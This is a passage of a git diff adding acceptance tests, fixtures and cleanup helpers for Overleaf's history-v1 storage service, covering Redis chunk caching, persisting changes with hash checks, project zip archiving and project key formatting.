+ expect(cachedChunk).to.deep.equal(chunk) + }) + }) + + describe('updating already cached chunks', function () { + it('should replace a chunk with a longer chunk', async function () { + // Set initial chunk with one change + const snapshotA = new Snapshot() + const changesA = [ + new Change( + [ + new AddFileOperation( + 'test.tex', + File.fromString('Initial content') + ), + ], + new Date(), + [] + ), + ] + const historyA = new History(snapshotA, changesA) + const chunkA = new Chunk(historyA, 10) + + await redisBackend.setCurrentChunk(projectId, chunkA) + + // Verify the initial chunk was cached + const cachedChunkA = await redisBackend.getCurrentChunk(projectId) + expect(cachedChunkA.getStartVersion()).to.equal(10) + expect(cachedChunkA.getEndVersion()).to.equal(11) + expect(cachedChunkA.history.changes.length).to.equal(1) + + // Create a longer chunk (with more changes) + const snapshotB = new Snapshot() + const 
changesB = [ + new Change( + [new AddFileOperation('test1.tex', File.fromString('Content 1'))], + new Date(), + [] + ), + new Change( + [new AddFileOperation('test2.tex', File.fromString('Content 2'))], + new Date(), + [] + ), + new Change( + [new AddFileOperation('test3.tex', File.fromString('Content 3'))], + new Date(), + [] + ), + ] + const historyB = new History(snapshotB, changesB) + const chunkB = new Chunk(historyB, 15) + + // Replace the cached chunk + await redisBackend.setCurrentChunk(projectId, chunkB) + + // Verify the new chunk replaced the old one + const cachedChunkB = await redisBackend.getCurrentChunk(projectId) + expect(cachedChunkB).to.not.be.null + expect(cachedChunkB.getStartVersion()).to.equal(15) + expect(cachedChunkB.getEndVersion()).to.equal(18) + expect(cachedChunkB.history.changes.length).to.equal(3) + expect(cachedChunkB).to.deep.equal(chunkB) + + // Verify the metadata was updated + const updatedMetadata = + await redisBackend.getCurrentChunkMetadata(projectId) + expect(updatedMetadata.startVersion).to.equal(15) + expect(updatedMetadata.changesCount).to.equal(3) + }) + + it('should replace a chunk with a shorter chunk', async function () { + // Set initial chunk with three changes + const snapshotA = new Snapshot() + const changesA = [ + new Change( + [new AddFileOperation('file1.tex', File.fromString('Content 1'))], + new Date(), + [] + ), + new Change( + [new AddFileOperation('file2.tex', File.fromString('Content 2'))], + new Date(), + [] + ), + new Change( + [new AddFileOperation('file3.tex', File.fromString('Content 3'))], + new Date(), + [] + ), + ] + const historyA = new History(snapshotA, changesA) + const chunkA = new Chunk(historyA, 20) + + await redisBackend.setCurrentChunk(projectId, chunkA) + + // Verify the initial chunk was cached + const cachedChunkA = await redisBackend.getCurrentChunk(projectId) + expect(cachedChunkA.getStartVersion()).to.equal(20) + expect(cachedChunkA.getEndVersion()).to.equal(23) + expect(cachedChunkA.history.changes.length).to.equal(3) + + // Create a shorter chunk (with fewer changes) + const snapshotB = new Snapshot() + const changesB = [ + new Change( + [new AddFileOperation('new.tex', File.fromString('New content'))], + new Date(), + [] + ), + ] + const historyB = new History(snapshotB, changesB) + const chunkB = new Chunk(historyB, 30) + + // Replace the cached chunk + await redisBackend.setCurrentChunk(projectId, chunkB) + + // Verify the new chunk replaced the old one + const cachedChunkB = await redisBackend.getCurrentChunk(projectId) + expect(cachedChunkB).to.not.be.null + expect(cachedChunkB.getStartVersion()).to.equal(30) + expect(cachedChunkB.getEndVersion()).to.equal(31) + expect(cachedChunkB.history.changes.length).to.equal(1) + expect(cachedChunkB).to.deep.equal(chunkB) + + // Verify the metadata was updated + const updatedMetadata = + await redisBackend.getCurrentChunkMetadata(projectId) + expect(updatedMetadata.startVersion).to.equal(30) + expect(updatedMetadata.changesCount).to.equal(1) + }) + + it('should replace a chunk with a zero-length chunk', async function () { + // Set initial chunk with changes + const snapshotA = new Snapshot() + const changesA = [ + new Change( + [new AddFileOperation('file1.tex', File.fromString('Content 1'))], + new Date(), + [] + ), + new Change( + [new AddFileOperation('file2.tex', File.fromString('Content 2'))], + new Date(), + [] + ), + ] + const historyA = new History(snapshotA, changesA) + const chunkA = new Chunk(historyA, 25) + + await 
redisBackend.setCurrentChunk(projectId, chunkA) + + // Verify the initial chunk was cached + const cachedChunkA = await redisBackend.getCurrentChunk(projectId) + expect(cachedChunkA.getStartVersion()).to.equal(25) + expect(cachedChunkA.getEndVersion()).to.equal(27) + expect(cachedChunkA.history.changes.length).to.equal(2) + + // Create a zero-length chunk (with no changes) + const snapshotB = new Snapshot() + const changesB = [] + const historyB = new History(snapshotB, changesB) + const chunkB = new Chunk(historyB, 40) + + // Replace the cached chunk + await redisBackend.setCurrentChunk(projectId, chunkB) + + // Verify the new chunk replaced the old one + const cachedChunkB = await redisBackend.getCurrentChunk(projectId) + expect(cachedChunkB).to.not.be.null + expect(cachedChunkB.getStartVersion()).to.equal(40) + expect(cachedChunkB.getEndVersion()).to.equal(40) // Start version equals end version with no changes + expect(cachedChunkB.history.changes.length).to.equal(0) + expect(cachedChunkB).to.deep.equal(chunkB) + + // Verify the metadata was updated + const updatedMetadata = + await redisBackend.getCurrentChunkMetadata(projectId) + expect(updatedMetadata.startVersion).to.equal(40) + expect(updatedMetadata.changesCount).to.equal(0) + }) + + it('should replace a zero-length chunk with a non-empty chunk', async function () { + // Set initial empty chunk + const snapshotA = new Snapshot() + const changesA = [] + const historyA = new History(snapshotA, changesA) + const chunkA = new Chunk(historyA, 50) + + await redisBackend.setCurrentChunk(projectId, chunkA) + + // Verify the initial chunk was cached + const cachedChunkA = await redisBackend.getCurrentChunk(projectId) + expect(cachedChunkA.getStartVersion()).to.equal(50) + expect(cachedChunkA.getEndVersion()).to.equal(50) + expect(cachedChunkA.history.changes.length).to.equal(0) + + // Create a non-empty chunk + const snapshotB = new Snapshot() + const changesB = [ + new Change( + [new AddFileOperation('newfile.tex', File.fromString('New content'))], + new Date(), + [] + ), + new Change( + [ + new AddFileOperation( + 'another.tex', + File.fromString('Another file') + ), + ], + new Date(), + [] + ), + ] + const historyB = new History(snapshotB, changesB) + const chunkB = new Chunk(historyB, 60) + + // Replace the cached chunk + await redisBackend.setCurrentChunk(projectId, chunkB) + + // Verify the new chunk replaced the old one + const cachedChunkB = await redisBackend.getCurrentChunk(projectId) + expect(cachedChunkB).to.not.be.null + expect(cachedChunkB.getStartVersion()).to.equal(60) + expect(cachedChunkB.getEndVersion()).to.equal(62) + expect(cachedChunkB.history.changes.length).to.equal(2) + expect(cachedChunkB).to.deep.equal(chunkB) + + // Verify the metadata was updated + const updatedMetadata = + await redisBackend.getCurrentChunkMetadata(projectId) + expect(updatedMetadata.startVersion).to.equal(60) + expect(updatedMetadata.changesCount).to.equal(2) + }) + }) + + describe('checkCacheValidity', function () { + it('should return true when versions match', function () { + const snapshotA = new Snapshot() + const historyA = new History(snapshotA, []) + const chunkA = new Chunk(historyA, 10) + chunkA.pushChanges([ + new Change( + [new AddFileOperation('test.tex', File.fromString('Hello'))], + new Date(), + [] + ), + ]) + + const snapshotB = new Snapshot() + const historyB = new History(snapshotB, []) + const chunkB = new Chunk(historyB, 10) + chunkB.pushChanges([ + new Change( + [new AddFileOperation('test.tex', 
File.fromString('Hello'))], + new Date(), + [] + ), + ]) + + const isValid = redisBackend.checkCacheValidity(chunkA, chunkB) + expect(isValid).to.be.true + }) + + it('should return false when start versions differ', function () { + const snapshotA = new Snapshot() + const historyA = new History(snapshotA, []) + const chunkA = new Chunk(historyA, 10) + + const snapshotB = new Snapshot() + const historyB = new History(snapshotB, []) + const chunkB = new Chunk(historyB, 11) + + const isValid = redisBackend.checkCacheValidity(chunkA, chunkB) + expect(isValid).to.be.false + }) + + it('should return false when end versions differ', function () { + const snapshotA = new Snapshot() + const historyA = new History(snapshotA, []) + const chunkA = new Chunk(historyA, 10) + chunkA.pushChanges([ + new Change( + [new AddFileOperation('test.tex', File.fromString('Hello'))], + new Date(), + [] + ), + ]) + + const snapshotB = new Snapshot() + const historyB = new History(snapshotB, []) + const chunkB = new Chunk(historyB, 10) + chunkB.pushChanges([ + new Change( + [new AddFileOperation('test.tex', File.fromString('Hello'))], + new Date(), + [] + ), + new Change( + [new AddFileOperation('other.tex', File.fromString('World'))], + new Date(), + [] + ), + ]) + + const isValid = redisBackend.checkCacheValidity(chunkA, chunkB) + expect(isValid).to.be.false + }) + + it('should return false when cached chunk is null', function () { + const snapshotB = new Snapshot() + const historyB = new History(snapshotB, []) + const chunkB = new Chunk(historyB, 10) + + const isValid = redisBackend.checkCacheValidity(null, chunkB) + expect(isValid).to.be.false + }) + }) + + describe('compareChunks', function () { + it('should return true when chunks are identical', function () { + // Create two identical chunks + const snapshot = new Snapshot() + const changes = [ + new Change( + [new AddFileOperation('test.tex', File.fromString('Hello World'))], + new Date('2025-04-10T12:00:00Z'), // Using fixed date for consistent comparison + [] + ), + ] + const history1 = new History(snapshot, changes) + const chunk1 = new Chunk(history1, 5) + + // Create a separate but identical chunk + const snapshot2 = new Snapshot() + const changes2 = [ + new Change( + [new AddFileOperation('test.tex', File.fromString('Hello World'))], + new Date('2025-04-10T12:00:00Z'), // Using same fixed date + [] + ), + ] + const history2 = new History(snapshot2, changes2) + const chunk2 = new Chunk(history2, 5) + + const result = redisBackend.compareChunks(projectId, chunk1, chunk2) + expect(result).to.be.true + }) + + it('should return false when chunks differ', function () { + // Create first chunk + const snapshot1 = new Snapshot() + const changes1 = [ + new Change( + [new AddFileOperation('test.tex', File.fromString('Hello World'))], + new Date('2025-04-10T12:00:00Z'), + [] + ), + ] + const history1 = new History(snapshot1, changes1) + const chunk1 = new Chunk(history1, 5) + + // Create a different chunk (different content) + const snapshot2 = new Snapshot() + const changes2 = [ + new Change( + [ + new AddFileOperation( + 'test.tex', + File.fromString('Different content') + ), + ], + new Date('2025-04-10T12:00:00Z'), + [] + ), + ] + const history2 = new History(snapshot2, changes2) + const chunk2 = new Chunk(history2, 5) + + const result = redisBackend.compareChunks(projectId, chunk1, chunk2) + expect(result).to.be.false + }) + + it('should return false when one chunk is null', function () { + // Create a chunk + const snapshot = new Snapshot() + const changes = 
[ + new Change( + [new AddFileOperation('test.tex', File.fromString('Hello World'))], + new Date('2025-04-10T12:00:00Z'), + [] + ), + ] + const history = new History(snapshot, changes) + const chunk = new Chunk(history, 5) + + const resultWithNullCached = redisBackend.compareChunks( + projectId, + null, + chunk + ) + expect(resultWithNullCached).to.be.false + + const resultWithNullCurrent = redisBackend.compareChunks( + projectId, + chunk, + null + ) + expect(resultWithNullCurrent).to.be.false + }) + + it('should return false when chunks have different start versions', function () { + // Create first chunk with start version 5 + const snapshot1 = new Snapshot() + const changes1 = [ + new Change( + [new AddFileOperation('test.tex', File.fromString('Hello World'))], + new Date('2025-04-10T12:00:00Z'), + [] + ), + ] + const history1 = new History(snapshot1, changes1) + const chunk1 = new Chunk(history1, 5) + + // Create second chunk with identical content but different start version (10) + const snapshot2 = new Snapshot() + const changes2 = [ + new Change( + [new AddFileOperation('test.tex', File.fromString('Hello World'))], + new Date('2025-04-10T12:00:00Z'), + [] + ), + ] + const history2 = new History(snapshot2, changes2) + const chunk2 = new Chunk(history2, 10) + + const result = redisBackend.compareChunks(projectId, chunk1, chunk2) + expect(result).to.be.false + }) + }) + + describe('integration with redis', function () { + it('should store and retrieve complex chunks correctly', async function () { + // Create a more complex chunk + const snapshot = new Snapshot() + const changes = [ + new Change( + [new AddFileOperation('file1.tex', File.fromString('Content 1'))], + new Date(), + [1234] + ), + new Change( + [new AddFileOperation('file2.tex', File.fromString('Content 2'))], + new Date(), + null, + new Origin('test-origin'), + ['5a296963ad5e82432674c839', null], + '123.4', + new V2DocVersions({ + 'random-doc-id': { pathname: 'file2.tex', v: 123 }, + }) + ), + new Change( + [new AddFileOperation('file3.tex', File.fromString('Content 3'))], + new Date(), + [] + ), + ] + const history = new History(snapshot, changes) + const chunk = new Chunk(history, 20) + + // Cache the chunk + await redisBackend.setCurrentChunk(projectId, chunk) + + // Retrieve the cached chunk + const cachedChunk = await redisBackend.getCurrentChunk(projectId) + + expect(cachedChunk.getStartVersion()).to.equal(20) + expect(cachedChunk.getEndVersion()).to.equal(23) + expect(cachedChunk).to.deep.equal(chunk) + expect(cachedChunk.history.changes.length).to.equal(3) + + // Check that the operations were preserved correctly + const retrievedChanges = cachedChunk.history.changes + expect(retrievedChanges[0].getOperations()[0].getPathname()).to.equal( + 'file1.tex' + ) + expect(retrievedChanges[1].getOperations()[0].getPathname()).to.equal( + 'file2.tex' + ) + expect(retrievedChanges[2].getOperations()[0].getPathname()).to.equal( + 'file3.tex' + ) + + // Check that the chunk was stored correctly using the chunk metadata + const chunkMetadata = + await redisBackend.getCurrentChunkMetadata(projectId) + expect(chunkMetadata).to.not.be.null + expect(chunkMetadata.startVersion).to.equal(20) + expect(chunkMetadata.changesCount).to.equal(3) + }) + }) +}) diff --git a/services/history-v1/test/acceptance/js/storage/files/empty.tex b/services/history-v1/test/acceptance/js/storage/files/empty.tex new file mode 100644 index 0000000..e69de29 diff --git a/services/history-v1/test/acceptance/js/storage/files/graph.png 
b/services/history-v1/test/acceptance/js/storage/files/graph.png new file mode 100644 index 0000000..81dac49 Binary files /dev/null and b/services/history-v1/test/acceptance/js/storage/files/graph.png differ diff --git a/services/history-v1/test/acceptance/js/storage/files/hello.txt b/services/history-v1/test/acceptance/js/storage/files/hello.txt new file mode 100644 index 0000000..80dc915 --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/files/hello.txt @@ -0,0 +1 @@ +Olá mundo diff --git a/services/history-v1/test/acceptance/js/storage/files/non_bmp.txt b/services/history-v1/test/acceptance/js/storage/files/non_bmp.txt new file mode 100644 index 0000000..323ec63 --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/files/non_bmp.txt @@ -0,0 +1 @@ +􏰁􏰁􏰁􏰁􏰁􏰁􏰁􏰁􏰁􏰁􏰁􏰁􏰁􏰁 diff --git a/services/history-v1/test/acceptance/js/storage/files/null_characters.txt b/services/history-v1/test/acceptance/js/storage/files/null_characters.txt new file mode 100644 index 0000000..4227ca4 Binary files /dev/null and b/services/history-v1/test/acceptance/js/storage/files/null_characters.txt differ diff --git a/services/history-v1/test/acceptance/js/storage/fixtures/chunks.js b/services/history-v1/test/acceptance/js/storage/fixtures/chunks.js new file mode 100644 index 0000000..0fb50e4 --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/fixtures/chunks.js @@ -0,0 +1,21 @@ +'use strict' + +const DocFixtures = require('./docs').docs + +exports.chunks = { + chunkOne: { + id: 1000000, + doc_id: DocFixtures.initializedProject.id, + start_version: 0, + end_version: 1, + end_timestamp: new Date('2032-01-01'), + }, +} + +exports.histories = { + chunkOne: { + projectId: DocFixtures.initializedProject.id, + chunkId: '1000000', + json: { snapshot: { files: {} }, changes: [] }, + }, +} diff --git a/services/history-v1/test/acceptance/js/storage/fixtures/docs.js b/services/history-v1/test/acceptance/js/storage/fixtures/docs.js new file mode 100644 index 0000000..f757896 --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/fixtures/docs.js @@ -0,0 +1,9 @@ +'use strict' + +// Test docs are no longer inserted in the database. Only their ids are now +// relevant as they are used in history chunks. 
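+//
+// Illustrative cross-reference (an editorial sketch, not part of the original
+// fixtures): the chunk fixtures in ./chunks.js reference these ids, e.g.
+//
+//   const { docs } = require('./docs')
+//   const { chunks } = require('./chunks')
+//   console.log(chunks.chunkOne.doc_id === docs.initializedProject.id) // true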
+ +exports.docs = { + uninitializedProject: { id: '1000000' }, + initializedProject: { id: '1000001' }, +} diff --git a/services/history-v1/test/acceptance/js/storage/fixtures/index.js b/services/history-v1/test/acceptance/js/storage/fixtures/index.js new file mode 100644 index 0000000..4f1f74b --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/fixtures/index.js @@ -0,0 +1,7 @@ +'use strict' + +exports.dbSpecs = { + chunks: Object.values(require('./chunks').chunks), + histories: Object.values(require('./chunks').histories), + docs: Object.values(require('./docs').docs), +} diff --git a/services/history-v1/test/acceptance/js/storage/persist_changes.test.js b/services/history-v1/test/acceptance/js/storage/persist_changes.test.js new file mode 100644 index 0000000..aa56dc8 --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/persist_changes.test.js @@ -0,0 +1,249 @@ +'use strict' + +const { createHash } = require('node:crypto') +const { expect } = require('chai') + +const cleanup = require('./support/cleanup') +const fixtures = require('./support/fixtures') + +const storage = require('../../../../storage') +const chunkStore = storage.chunkStore +const persistChanges = storage.persistChanges + +const core = require('overleaf-editor-core') +const AddFileOperation = core.AddFileOperation +const EditFileOperation = core.EditFileOperation +const TextOperation = core.TextOperation +const Change = core.Change +const Chunk = core.Chunk +const File = core.File +const History = core.History +const Snapshot = core.Snapshot + +describe('persistChanges', function () { + beforeEach(cleanup.everything) + beforeEach(fixtures.create) + + let farFuture + before(function () { + // used to provide a limit which forces us to persist all of the changes. 
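+    // (Editorial sketch of the mechanism, assuming persistChanges compares
+    // each change's timestamp against these limits: a timestamp one week
+    // ahead, i.e. new Date(Date.now() + 7 * 24 * 3600 * 1000), can never be
+    // reached by a test change, so no time-based limit triggers and every
+    // change is persisted immediately.)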
+ farFuture = new Date() + farFuture.setTime(farFuture.getTime() + 7 * 24 * 3600 * 1000) + }) + + it('persists changes', async function () { + const limitsToPersistImmediately = { + minChangeTimestamp: farFuture, + maxChangeTimestamp: farFuture, + } + const projectId = fixtures.docs.uninitializedProject.id + const change = new Change( + [new AddFileOperation('test.tex', File.fromString(''))], + new Date(), + [] + ) + const changes = [change] + + await chunkStore.initializeProject(projectId) + const result = await persistChanges( + projectId, + changes, + limitsToPersistImmediately, + 0 + ) + + const history = new History(new Snapshot(), changes) + const currentChunk = new Chunk(history, 0) + expect(result).to.deep.equal({ + numberOfChangesPersisted: 1, + originalEndVersion: 0, + currentChunk, + }) + + const chunk = await chunkStore.loadLatest(projectId) + expect(chunk.getStartVersion()).to.equal(0) + expect(chunk.getEndVersion()).to.equal(1) + expect(chunk.getChanges().length).to.equal(1) + }) + + it('persists changes in two chunks', async function () { + const limitsToPersistImmediately = { + maxChunkChanges: 1, + minChangeTimestamp: farFuture, + maxChangeTimestamp: farFuture, + } + const projectId = fixtures.docs.uninitializedProject.id + const firstChange = new Change( + [new AddFileOperation('a.tex', File.fromString(''))], + new Date(), + [] + ) + const secondChange = new Change( + [new AddFileOperation('b.tex', File.fromString(''))], + new Date(), + [] + ) + const changes = [firstChange, secondChange] + + await chunkStore.initializeProject(projectId) + const result = await persistChanges( + projectId, + changes, + limitsToPersistImmediately, + 0 + ) + + const snapshot = Snapshot.fromRaw({ + files: { + 'a.tex': { + content: '', + }, + }, + }) + const history = new History(snapshot, [secondChange]) + const currentChunk = new Chunk(history, 1) + expect(result).to.deep.equal({ + numberOfChangesPersisted: 2, + originalEndVersion: 0, + currentChunk, + }) + + const chunk = await chunkStore.loadLatest(projectId) + expect(chunk.getStartVersion()).to.equal(1) + expect(chunk.getEndVersion()).to.equal(2) + expect(chunk.getChanges().length).to.equal(1) + }) + + it('persists the snapshot at the start of the chunk', async function () { + const limitsToPersistImmediately = { + maxChunkChanges: 2, + minChangeTimestamp: farFuture, + maxChangeTimestamp: farFuture, + } + const projectId = fixtures.docs.uninitializedProject.id + const firstChange = new Change( + [new AddFileOperation('a.tex', File.fromString(''))], + new Date(), + [] + ) + const secondChange = new Change( + [new AddFileOperation('b.tex', File.fromString(''))], + new Date(), + [] + ) + const changes = [firstChange, secondChange] + + await chunkStore.initializeProject(projectId) + const result = await persistChanges( + projectId, + changes, + limitsToPersistImmediately, + 0 + ) + + const history = new History(new Snapshot(), changes) + const currentChunk = new Chunk(history, 0) + expect(result).to.deep.equal({ + numberOfChangesPersisted: 2, + originalEndVersion: 0, + currentChunk, + }) + + const chunk = await chunkStore.loadLatest(projectId) + expect(chunk.getStartVersion()).to.equal(0) + expect(chunk.getEndVersion()).to.equal(2) + expect(chunk.getChanges().length).to.equal(2) + }) + + it("errors if the version doesn't match the latest chunk", async function () { + const limitsToPersistImmediately = { + minChangeTimestamp: farFuture, + maxChangeTimestamp: farFuture, + } + const projectId = fixtures.docs.uninitializedProject.id + const 
firstChange = new Change( + [new AddFileOperation('a.tex', File.fromString(''))], + new Date(), + [] + ) + const secondChange = new Change( + [new AddFileOperation('b.tex', File.fromString(''))], + new Date(), + [] + ) + const changes = [firstChange, secondChange] + + await chunkStore.initializeProject(projectId) + await expect( + persistChanges(projectId, changes, limitsToPersistImmediately, 1) + ).to.be.rejectedWith( + 'client sent updates with end_version 1 but latest chunk has end_version 0' + ) + }) + + describe('content hash validation', function () { + it('accepts a change with a valid hash', async function () { + const limitsToPersistImmediately = { + minChangeTimestamp: farFuture, + maxChangeTimestamp: farFuture, + } + + const projectId = fixtures.docs.uninitializedProject.id + await chunkStore.initializeProject(projectId) + const textOperation = new TextOperation() + textOperation.insert('hello ') + textOperation.retain(5) + textOperation.contentHash = hashString('hello world') + const change = new Change( + [ + new AddFileOperation('a.tex', File.fromString('world')), + new EditFileOperation('a.tex', textOperation), + ], + new Date(), + [] + ) + const changes = [change] + + const result = await persistChanges( + projectId, + changes, + limitsToPersistImmediately, + 0 + ) + expect(result.numberOfChangesPersisted).to.equal(1) + }) + + it('rejects a change with an invalid hash', async function () { + const limitsToPersistImmediately = { + minChangeTimestamp: farFuture, + maxChangeTimestamp: farFuture, + } + + const projectId = fixtures.docs.uninitializedProject.id + await chunkStore.initializeProject(projectId) + const textOperation = new TextOperation() + textOperation.insert('hello ') + textOperation.retain(5) + textOperation.contentHash = hashString('bad hash') + const change = new Change( + [ + new AddFileOperation('a.tex', File.fromString('world')), + new EditFileOperation('a.tex', textOperation), + ], + new Date(), + [] + ) + const changes = [change] + + await expect( + persistChanges(projectId, changes, limitsToPersistImmediately, 0) + ).to.be.rejectedWith(storage.InvalidChangeError) + }) + }) +}) + +function hashString(s) { + const hash = createHash('sha-1') + hash.update(s) + return hash.digest('hex') +} diff --git a/services/history-v1/test/acceptance/js/storage/project_archive.test.js b/services/history-v1/test/acceptance/js/storage/project_archive.test.js new file mode 100644 index 0000000..d9112b1 --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/project_archive.test.js @@ -0,0 +1,208 @@ +'use strict' + +const _ = require('lodash') +const BPromise = require('bluebird') +const { expect } = require('chai') +const fs = BPromise.promisifyAll(require('node:fs')) +const sinon = require('sinon') +const stream = require('node:stream') +const temp = require('temp') + +const cleanup = require('./support/cleanup') +const fixtures = require('./support/fixtures') +const testFiles = require('./support/test_files') +const unzip = require('./support/unzip') + +const core = require('overleaf-editor-core') +const File = core.File +const Snapshot = core.Snapshot + +const storage = require('../../../../storage') +const BlobStore = storage.BlobStore +const ProjectArchive = storage.ProjectArchive + +describe('ProjectArchive', function () { + beforeEach(cleanup.everything) + beforeEach(fixtures.create) + + const projectId = '123' + const blobStore = new BlobStore(projectId) + + let zipFilePath + beforeEach(function () { + zipFilePath = temp.path({ suffix: '.zip' }) + }) + 
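+  // (Editorial note, assuming the usual behaviour of the temp package:
+  // temp.path() only generates a unique pathname and creates nothing on
+  // disk, so the afterEach below can simply swallow unlink errors, e.g.
+  //   fs.unlinkAsync(zipFilePath).catch(() => {})
+  // which is a no-op when a test failed before writing the zip.)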
afterEach(function () { + return fs.unlinkAsync(zipFilePath).catch(() => {}) + }) + + function makeMixedTestSnapshot(rounds) { + const snapshot = new Snapshot() + + return blobStore.putFile(testFiles.path('graph.png')).then(() => { + _.times(rounds, i => { + snapshot.addFile('test' + i + '.txt', File.fromString('test')) + snapshot.addFile( + 'graph' + i + '.png', + File.fromHash(testFiles.GRAPH_PNG_HASH) + ) + }) + return snapshot + }) + } + + function makeTextTestSnapshot(rounds) { + const snapshot = new Snapshot() + _.times(rounds, i => { + snapshot.addFile('test' + i + '.txt', File.fromString('test')) + }) + return snapshot + } + + it('archives a small snapshot with binary and text data', function () { + return makeMixedTestSnapshot(1) + .then(snapshot => { + const projectArchive = new ProjectArchive(snapshot) + return projectArchive.writeZip(blobStore, zipFilePath) + }) + .then(() => { + return unzip.getZipEntries(zipFilePath) + }) + .then(zipEntries => { + expect(zipEntries).to.have.length(2) + zipEntries = _.sortBy(zipEntries, 'fileName') + expect(zipEntries[0].fileName).to.equal('graph0.png') + expect(zipEntries[0].uncompressedSize).to.equal( + testFiles.GRAPH_PNG_BYTE_LENGTH + ) + expect(zipEntries[1].fileName).to.equal('test0.txt') + expect(zipEntries[1].uncompressedSize).to.equal(4) + }) + }) + + it('archives a larger snapshot with binary and text data', function () { + return makeMixedTestSnapshot(10) + .then(snapshot => { + const projectArchive = new ProjectArchive(snapshot) + return projectArchive.writeZip(blobStore, zipFilePath) + }) + .then(() => { + return unzip.getZipEntries(zipFilePath) + }) + .then(zipEntries => { + expect(zipEntries).to.have.length(20) + }) + }) + + it('archives empty files', function () { + const snapshot = new Snapshot() + snapshot.addFile('test0', File.fromString('')) + snapshot.addFile('test1', File.fromHash(File.EMPTY_FILE_HASH)) + + return blobStore + .putString('') + .then(() => { + const projectArchive = new ProjectArchive(snapshot) + return projectArchive.writeZip(blobStore, zipFilePath) + }) + .then(() => { + return unzip.getZipEntries(zipFilePath) + }) + .then(zipEntries => { + zipEntries = _.sortBy(zipEntries, 'fileName') + expect(zipEntries[0].fileName).to.equal('test0') + expect(zipEntries[0].uncompressedSize).to.equal(0) + expect(zipEntries[1].fileName).to.equal('test1') + expect(zipEntries[1].uncompressedSize).to.equal(0) + }) + }) + + describe('with a blob stream download error', function () { + beforeEach(function () { + const testStream = new stream.Readable({ + read: function () { + testStream.destroy(new Error('test read error')) + }, + }) + sinon.stub(blobStore, 'getStream').resolves(testStream) + }) + + afterEach(function () { + blobStore.getStream.restore() + }) + + it('rejects with the error', function () { + return makeMixedTestSnapshot(1) + .then(snapshot => { + const projectArchive = new ProjectArchive(snapshot) + return projectArchive.writeZip(blobStore, zipFilePath) + }) + .then(() => { + expect.fail() + }) + .catch(err => { + let message = err.message + if (err instanceof ProjectArchive.DownloadError) { + message = err.cause.message + } + expect(message).to.match(/test read error/) + }) + }) + }) + + describe('with zip write error', function () { + beforeEach(function () { + sinon.stub(fs, 'createWriteStream').callsFake(path => { + const testStream = new stream.Writable({ + write: function (chunk, encoding, callback) { + callback(new Error('test write error')) + }, + }) + return testStream + }) + }) + + afterEach(function 
() { + fs.createWriteStream.restore() + }) + + it('rejects with the error', function () { + return makeMixedTestSnapshot(1) + .then(snapshot => { + const projectArchive = new ProjectArchive(snapshot) + return projectArchive.writeZip(blobStore, zipFilePath) + }) + .then(() => { + expect.fail() + }) + .catch(err => { + expect(err.message).to.equal('test write error') + }) + }) + }) + + describe('with a delayed file load', function () { + beforeEach(function () { + sinon.stub(File.prototype, 'load').callsFake(function () { + return BPromise.delay(200).thenReturn(this) + }) + }) + + afterEach(function () { + File.prototype.load.restore() + }) + + it('times out', function () { + const snapshot = makeTextTestSnapshot(10) + const projectArchive = new ProjectArchive(snapshot, 100) + return projectArchive + .writeZip(blobStore, zipFilePath) + .then(() => { + expect.fail() + }) + .catch(err => { + expect(err.name).to.equal('ArchiveTimeout') + }) + }) + }) +}) diff --git a/services/history-v1/test/acceptance/js/storage/project_key.test.js b/services/history-v1/test/acceptance/js/storage/project_key.test.js new file mode 100644 index 0000000..4aa6c1f --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/project_key.test.js @@ -0,0 +1,21 @@ +'use strict' + +const { expect } = require('chai') + +const { format, pad } = require('../../../../storage/lib/project_key') + +describe('projectKey', function () { + it('reverses padded keys', function () { + expect(format(1)).to.equal('100/000/000') + expect(format(12)).to.equal('210/000/000') + expect(format(123456789)).to.equal('987/654/321') + expect(format(9123456789)).to.equal('987/654/3219') + }) + + it('pads numbers with zeros to length 9', function () { + expect(pad(1)).to.equal('000000001') + expect(pad(10)).to.equal('000000010') + expect(pad(100000000)).to.equal('100000000') + expect(pad(1000000000)).to.equal('1000000000') + }) +}) diff --git a/services/history-v1/test/acceptance/js/storage/support/cleanup.js b/services/history-v1/test/acceptance/js/storage/support/cleanup.js new file mode 100644 index 0000000..55829be --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/support/cleanup.js @@ -0,0 +1,101 @@ +const config = require('config') + +const { knex, persistor, mongodb, redis } = require('../../../../../storage') +const { S3Persistor } = require('@overleaf/object-persistor/src/S3Persistor') + +const POSTGRES_TABLES = [ + 'chunks', + 'project_blobs', + 'old_chunks', + 'pending_chunks', +] + +const MONGO_COLLECTIONS = [ + 'projectHistoryGlobalBlobs', + 'projectHistoryBlobs', + 'projectHistoryShardedBlobs', + 'projectHistoryChunks', + + // back_fill_file_hash.test.mjs + 'deletedFiles', + 'deletedProjects', + 'projects', + 'projectHistoryBackedUpBlobs', +] + +// make sure we don't delete the wrong data by accident +if (process.env.NODE_ENV !== 'test') { + throw new Error('test cleanup can only be loaded in a test environment') +} + +async function cleanupPostgres() { + for (const table of POSTGRES_TABLES) { + await knex(table).del() + } +} + +async function cleanupMongo() { + const collections = await mongodb.db.listCollections().map(c => c.name) + for await (const collection of collections) { + if (MONGO_COLLECTIONS.includes(collection)) { + await mongodb.db.collection(collection).deleteMany({}) + } + } +} + +async function cleanupRedis() { + await redis.rclientHistory.flushdb() + await redis.rclientLock.flushdb() +} + +async function cleanupPersistor() { + await Promise.all([ + 
